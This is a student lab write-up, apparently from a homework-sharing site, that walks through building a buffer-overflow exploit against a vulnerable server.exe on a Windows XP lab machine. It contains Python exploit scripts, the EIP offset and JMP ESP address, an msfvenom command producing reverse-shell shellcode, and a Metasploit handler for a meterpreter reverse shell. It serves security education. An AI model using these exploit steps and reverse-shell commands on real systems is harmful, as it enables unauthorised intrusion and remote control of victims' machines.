This workshop covers exploit development, including setting up virtual machines, creating attack code, and weaponizing vulnerabilities. Step-by-step instructions and code samples are provided.
Contribute Materials
Your contribution can guide someone’s learning journey. Share your
documents today.
Running head: WORKSHOP – EXPLOIT DEVELOPMENT Workshop – Exploit Development Name of the Student Name of the University Author’s Note
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
1 WORKSHOP – EXPLOIT DEVELOPMENT For the preparation of the workshop two virtual machine is setup in VmWare i.e. Kali Linux and Windows XP and for both the machines the network configuration is set to NAT. The configuration NAT enables the private IP to be connected with the internet and enable communication. The IP address are checked for enabling communication between the machines and on the windows machine the immunity debugger is opened for running the python script and loading the server.exe and executed. Then in the next step the kali linux is used for creating a file using the vi editor and is named as attack.py. The code given in the workshop is inserted in the file that is given below: #!/usr/bin/python import sys import os import socket host = sys.argv[1] port = int(sys.argv[2]) # Testing buffer = "\x41"*500 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) con = s.connect((host, port)) s.send(buffer) s.close() The command “python attack.py 192.168.0.57 1337”is executed for proceeding with the attack. The IP address used is the IP address of the windows host. In the windows machine the keys shift + F9 is pressed for passing the exception and execution of the code. A sample result is found that is given in
2 WORKSHOP – EXPLOIT DEVELOPMENT the following screenshot where the EIP values changes to the value used by the attacker and it is also similar for the EBP value. The ESP is used for pointing to a certain region of memory and it contains the value that is injected by the attacker. For weaponizing the vulnerability the immunity debugger is used and the server .exe is restarted and the execution is started. In the command line interface of the kali linux machine the following command “cd /usr/share/metasploit-framework/tools/exploit”is used for entering into the metasploit framework. The command “./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337” is executed within Kali linux for getting the access of the windows host machine. On the other hand ialeun the windows the shift + F9 is pressed for adding the exception and the result is viewed for the identification of the EIP value. For the determination of the offset value of the EIP the command “./pattern_offset.rb -l 5000 -q 37694136” is used and the returned result is noted. For the given case it is 260 and depending on this the address for the code is determined that jumps to the ESP. The ESP is used for the representation of the pointer for a memory for the management of the control. The server.exe is restarted by pressing the CTRL + F2 and F9 is pressed after starting the immunity debugger. For viewing the executable modules ALT+ E is pressed in the windows virtual machine. A searching is done for the JMP ESP and if the result contains GDI 32 the memory address is noted. The attack code in the kali linux machine is modified according to the workshop and the commands is: #!/usr/bin/python
3 WORKSHOP – EXPLOIT DEVELOPMENT import sys import os import socket host = sys.argv[1] port = int(sys.argv[2]) # EIP is overwritten at 260 bytes buffer = "\x41"*260 # Overwrite EIP with JMP ESP buffer += "\x78\x16\xF3\x77" # NOPSLED buffer += "\x90"*128 # Shellcode buffer += s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) con = s.connect((host, port)) s.send(buffer) s.close() The command “msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.2 -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python” is used and exploitation is performed. For the exploitation the code msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.2; exploit" is used and on the windows client the immunity debugger is closed.
Paraphrase This Document
Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
4 WORKSHOP – EXPLOIT DEVELOPMENT The modified python code is executed wit the IP address of the client for the completion of the workshop. Bibliography Cyber Security - CII ICT East 2017 | Ethical Hacking India | Ethical Hacking Institutes In India | Ethical Hacking Courses | Ethical Hacking Course In Kolkata - ISOEH. (2018).Isoeh.com. Retrieved21September2018,fromhttps://www.isoeh.com/CII-ICT-East-2017-cyber- security.html Definitions,E.,&Hope,C.(2018).WhatisEthicalHackingandanEthical Hacker?.Computerhope.com.Retrieved21September2018,from https://www.computerhope.com/jargon/e/ethihack.htm EthicalHacking-ComputingandSoftwareWiki.(2018).Wiki.cas.mcmaster.ca.Retrieved21 September 2018, fromhttp://wiki.cas.mcmaster.ca/index.php/Ethical_Hacking Ethical Hacking - ICT Issue. (2018).Sikandar's E-Portfolio. Retrieved 21 September 2018, from https://sikandarbttportfolio.weebly.com/ethical-hacking---ict-issue.html Freeman, R. (2016).Ethical hacking: what is it, and why would I need it?.IT Governance Blog. Retrieved 21 September 2018, fromhttps://www.itgovernance.co.uk/blog/ethical-hacking- what-is-it-and-why-would-i-need-it/ Whatisethicalhacker?-DefinitionfromWhatIs.com.(2018).SearchSecurity.Retrieved21 September 2018, fromhttps://searchsecurity.techtarget.com/definition/ethical-hacker